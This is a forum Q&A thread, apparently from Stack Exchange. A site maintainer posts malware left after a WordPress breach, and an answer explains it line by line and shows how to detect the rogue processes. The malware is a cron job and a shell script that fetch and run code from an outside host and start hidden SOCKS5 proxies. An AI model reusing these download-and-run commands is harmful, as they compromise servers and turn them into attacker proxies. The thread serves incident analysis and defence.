# some malware that appeared on our site related to the recent wordpress attack

Tags: wordpress, bash, malware, cracking

Apparently I site I do some volunteer work for was one of a few thousand sites targeted in a recent hack that exploited some vulnerability in wordpress. The result of the breach was a cron job added to the site:

```
0    */48    *    *    *    cd /tmp;wget clintonandersonperformancehorses.com/test/test;bash test;cd /tmp;rm -rf test
```

the file it was pulling is this (obviously, don't try to execute this...)

```
killall -9 perl
cd /tmp
wget clintonandersonperformancehorses.com/test/stest.tar
tar -vxf stest.tar
rm -rf stest.tar
cd stest
sh getip >>bug.txt
/sbin/ifconfig  |grep "inet addr" |grep -v 127.0.0 |grep -v \:.192\. |awk -F ':' '{print $2}' |awk -F ' ' '{print $1}' >>bug.txt
cat bug.txt |sort |uniq >clean.txt
rm -rf bug.txt
bash mbind clean.txt
bash binded.txt
cd ..
rm -rf stest
```

I was hoping someone could tell me what it does? I cleaned out the cron job and will follow all the other advice available to secure the site again, but I am worried that some additional damage might have been done that is not as obvious. I just can't figure out what the heck that file was actually doing.

Comment: _"what the heck that file was actually doing.":_ It kills all perl processes and then starts up SOCKS5 servers, specifically [Simple SOCKS5 Server for Perl](http://sourceforge.net/projects/ssspl/), on all the machine's external IP addresses.

Answer (score 3, accepted):

> I just can't figure out what the heck that file was actually doing.

#### Quick Summary

In summary, It kills all perl processes and then starts up SOCKS5 servers on all the machine's external IP addresses.

#### In Depth

In more detail, let's look at the script line-by-line:

```
killall -9 perl
```

This kills all `perl` processes.

```
cd /tmp
wget clintonandersonperformancehorses.com/test/stest.tar
tar -vxf stest.tar
rm -rf stest.tar
cd stest
```

The above downloads the file `stest.tar` and untars it in the `/tmp/stest` directory, deletes the `tar` file, and moves into the directory which now holds the downloaded files.

```
sh getip >>bug.txt
```

The `getip` script, part of `stest.tar`, uses `icanhazip.com` to find your public IP address and stores that in the file `bug.txt`.

```
/sbin/ifconfig  |grep "inet addr" |grep -v 127.0.0 |grep -v \:.192\. |awk -F ':' '{print $2}' |awk -F ' ' '{print $1}' >>bug.txt
cat bug.txt |sort |uniq >clean.txt
rm -rf bug.txt
```

The above uses `ifconfig` to check for any other non-local IP addresses that your machine answers to and adds them to `bug.txt`.  Duplicates are removed and the final list of your public IP addresses is saved in the file `clean.txt`.

```
bash mbind clean.txt
```

This is the meat of the script.  `mbind`, which was part of `stest.tar`, runs the script `inst` on each IP address in `clean.txt`.  For that IP address, `inst`, also part of `stest.tar`, selects a port at random and starts a copy of "Simple SOCKS5 Server for Perl" on that IP and that port.

More specifically, the SOCKS server that is run is version 1.4 of *Simple Socks Server for Perl* which can be [downloaded from sourceforge.](http://sourceforge.net/projects/ssspl/)  The version used here differs from the sourceforge in only minor respects: a help message is suppressed, the md5 option is removed, and the IP and port are included in the script, rather than passed on in on the command line.  I suspect that the purpose of the latter change is make the script's command line look relatively innocuous when viewed with a utility such as `ps`.

```
bash binded.txt
```

The script `binded.txt` was created by `inst`.  It apparently runs a check on the SOCKS5 server.

```
cd ..
rm -rf stest
```

The last part just does clean-up.  It removes all the un-tarred files and the temporary files created by the scripts.

#### How to determine if one of the SOCKS servers is still running

The script `inst` (part of the .tar file) starts each SOCKS server with the command:

```
/usr/bin/perl httpd
```

To see if one is still running, look through the output of `ps wax` and see if you see that command.  If you do it, use the `kill` command to stop it.

Comment: Thank you for the detailed explanation. What could a potential attacker do with the SOCKS5 Server running, assuming the script ran once before I caught it?

Comment: @KBriggs [SOCKS](http://en.wikipedia.org/wiki/SOCKS) can be used to act as a proxy server and to tunnel through firewalls.  That would appear to me to make it potentially quite dangerous.  For the full implications, you might try asking about it at [security.stackexchange.com](http://security.stackexchange.com/)

Comment: If you're interested in the outcome, here is the security post: http://security.stackexchange.com/questions/77518/malware-attack-on-my-website-may-have-started-a-socks-server-please-advise

Comment: @KBriggs I added a section to the answer to address the specific question of finding out if one of the SOCKS servers created by this script is still running.

Comment: thanks for the addition. Now I need to find out how to get a command prompt open using cPanel...

Comment: just need to ssh in, I guess... Thanks for all your help!